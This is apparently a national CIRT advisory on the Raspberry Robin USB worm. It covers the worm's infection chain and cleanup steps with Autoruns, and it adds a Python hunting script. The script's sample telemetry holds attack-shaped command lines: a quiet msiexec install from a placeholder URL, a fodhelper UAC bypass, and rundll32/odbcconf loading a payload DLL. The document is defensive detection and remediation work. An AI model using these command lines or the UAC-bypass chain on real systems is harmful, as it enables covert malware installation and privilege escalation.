Description
Researchers from Red Canary have discovered a new Windows malware family with worm-like capabilities, which they have named Raspberry Robin. The malware is reported to spread by means of infected removable USB drives.
Summary
The worm uses Windows Installer (msiexec.exe) to contact QNAP-related domains and download a malicious DLL. According to reports, infections were first observed in September 2021 at organisations with ties to the technology and manufacturing sectors.
How it works
Connecting an infected USB device to a Windows PC is the first step in a Raspberry Robin attack chain. The worm payload is present on the device and appears as a .LNK shortcut file pointing to what looks like a legitimate folder.
When the shortcut is opened, the worm uses cmd.exe to start a new process that reads and executes a malicious file stored on the external device.
Next, explorer.exe and msiexec.exe are launched. The latter is used for outbound network communication to a rogue domain for command-and-control (C2) purposes, as well as for downloading and installing a DLL library file.
After that, a series of legitimate Windows binaries (fodhelper.exe, rundll32.exe and odbcconf.exe) are used to load and execute the malicious DLL, with fodhelper.exe providing a bypass of User Account Control (UAC) so that the payload runs with elevated privileges without a prompt. It is suspected that the malicious DLL is installed to establish persistence on the infected system.
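The chain described above maps directly onto process-creation telemetry (for example Sysmon Event ID 1 or Windows Security event 4688). The Python below is an added example written for this advisory; it is not code from the original page or from Red Canary. It applies a few heuristics drawn from the described chain (cmd.exe spawned by explorer.exe reading a file on a removable drive, msiexec.exe installing from a remote URL, rundll32.exe or odbcconf.exe spawned by fodhelper.exe, and odbcconf.exe registering a DLL) to a constructed batch of process-creation records. The record field names, the drive letters treated as removable media, and every sample command line are assumptions made for illustration; they are not indicators published with the report.

```python
"""Hunt for a Raspberry Robin-style process chain in process-creation events.

Added example for this advisory, not code from the original page or from
Red Canary. Records, field names and sample values are constructed.
"""
import re
from typing import Dict, List

# Assumption: drive letters that this environment assigns to USB media.
REMOVABLE_DRIVES = {"D:", "E:", "F:", "G:"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Living-off-the-land binaries named in the advisory as DLL loaders.
DLL_LOADERS = {"rundll32.exe", "odbcconf.exe"}


def _image_name(path: str) -> str:
    """Return the lower-cased file name from a full image path."""
    return path.rsplit("\\", 1)[-1].lower()


def _reads_removable_file(cmdline: str) -> bool:
    """True if the command line references a path on an assumed removable drive."""
    return any(
        re.search(re.escape(drive) + r"\\", cmdline, re.IGNORECASE)
        for drive in REMOVABLE_DRIVES
    )


def find_suspicious(events: List[Dict]) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for events matching the chain heuristics.

    Each event is a dict with keys pid, ppid, image (full path) and cmdline.
    """
    by_pid = {e["pid"]: e for e in events}
    hits: Dict[int, List[str]] = {}

    for e in events:
        img = _image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = _image_name(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        reasons = []

        # 1. Shortcut on the USB device launches cmd.exe, which reads a file there.
        if img == "cmd.exe" and parent_img == "explorer.exe" and _reads_removable_file(cmd):
            reasons.append("cmd.exe from explorer.exe reading a file on a removable drive")
        # 2. Windows Installer fetching a package from a remote URL (download + install).
        if img == "msiexec.exe" and URL_RE.search(cmd):
            reasons.append("msiexec.exe installing from a remote URL")
        # 3. fodhelper.exe UAC bypass handing off to a DLL loader.
        if img in DLL_LOADERS and parent_img == "fodhelper.exe":
            reasons.append(f"{img} spawned by fodhelper.exe (UAC bypass chain)")
        # 4. odbcconf.exe used to register/load a DLL.
        if img == "odbcconf.exe" and ".dll" in cmd.lower():
            reasons.append("odbcconf.exe loading a DLL")

        if reasons:
            hits[e["pid"]] = reasons
    return hits


# Constructed sample telemetry: one benign msiexec.exe run (pid 104) mixed into
# a chain shaped like the one in the advisory. Paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /R "<E:\files\cfg.dat"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 103, "ppid": 101, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://example.invalid:8080/pkg"},
    {"pid": 104, "ppid": 1,   "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi /qn"},
    {"pid": 105, "ppid": 103, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,ShellExec_RunDLL C:\Windows\System32\fodhelper.exe"},
    {"pid": 106, "ppid": 105, "image": r"C:\Windows\System32\fodhelper.exe", "cmdline": "fodhelper.exe"},
    {"pid": 107, "ppid": 106, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\x\payload.dll,Entry"},
    {"pid": 108, "ppid": 107, "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe /a {REGSVR C:\ProgramData\x\payload.dll}"},
]

if __name__ == "__main__":
    for pid, reasons in sorted(find_suspicious(SAMPLE_EVENTS).items()):
        print(pid, "->", "; ".join(reasons))
```

Each heuristic on its own will produce some noise (msiexec.exe fetching packages over HTTP is legitimate in some deployment setups), so in practice the four should be correlated along the parent-child chain rather than alerted on individually; the locally installed package at pid 104 is deliberately left unflagged to show where the URL check draws the line.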
Remediation
Here are a few steps you can follow if you are, or suspect that you are, infected with this malware. Because the worm spreads via removable media, disconnect any USB drives from the affected machine first and do not connect them to other systems until they have been scanned or reformatted.
Download Autoruns. This program shows all auto-start applications and the Registry and file system locations they are launched from. You can download it from this link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
Restart your computer in Safe Mode. You can learn how to do this at the following link: https://www.bitdefender.com/consumer/support/answer/2129/
Extract the downloaded archive and run the Autoruns.exe file.
In the Autoruns application, click "Options" at the top and uncheck the "Hide Empty Locations" and "Hide Windows Entries" options. Then click the "Refresh" icon.
Check the list provided by Autoruns and locate the malware entry that you want to eliminate.
Write down its full path and file name. Note that some malware hides behind legitimate Windows process names, so at this stage it is very important not to remove genuine system files. Once you have located the suspicious entry, right-click its name and choose "Delete".
Deleting the entry in Autoruns only stops the malware from running automatically at the next system startup; the file itself remains on disk. Next, search your computer for the file name you wrote down. Be sure to enable the display of hidden files and folders before proceeding. If you find the malware file, remove it.
Reboot your computer in normal mode.
The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.
References
Gatlan, Sergiu. (5th May 2022). New Raspberry Robin worm uses Windows Installer to drop malware. Retrieved from Bleeping Computer. https://www.bleepingcomputer.com/news/security/new-raspberry-robin-worm-uses-windows-installer-to-drop-malware/
Lakshmanan, Ravie. (6th May 2022). Researchers Warn of “Raspberry Robin” Malware Spreading via External Drives. Retrieved from The Hacker News. https://thehackernews.com/2022/05/researchers-warn-of-raspberry-robin.html